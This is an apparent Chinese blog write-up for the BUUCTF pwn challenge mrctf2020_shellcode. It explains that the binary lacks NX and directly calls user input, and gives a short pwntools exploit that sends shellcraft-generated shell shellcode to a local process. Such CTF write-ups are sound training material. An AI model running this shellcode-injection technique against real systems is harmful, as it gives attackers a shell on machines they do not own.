BUUCTF Pwn mrctf2020_shellcode WP

艾莉莉阿文

于 2025-03-11 13:09:32 发布

阅读量167

点赞数 3

分类专栏： BUUCTF Pwn 文章标签：网络安全

本文链接：https://blog.youkuaiyun.com/qq_33348179/article/details/146175528

版权

BUUCTF 同时被 2 个专栏收录

71 篇文章

订阅专栏

Pwn

57 篇文章

订阅专栏

checksec exeinfo:

没开NX 开了PIE

64位 IDA64 打开：

发现main函数不能F5 直接看汇编：

先创建了buf(大小0x410) var4（大小0x4）两个变量

进行一次puts操作再进行一次读取0x400字节的read 存到buf

按理说构不成溢出但是下面的汇编:跳跃到11D6 将buf的内容存到rax 并进行call

结果就是直接输入shellcode就能执行：

exp：

from pwn import *

p = process('./mrctf')
context.log_level = 'debug'
context(os='linux', arch='amd64')

gdb.attach(p)
pause()

shellcode = asm(shellcraft.sh())

p.sendlineafter("magic!\n", shellcode)

p.interactive()

一定要记得设置context64位不然打不通！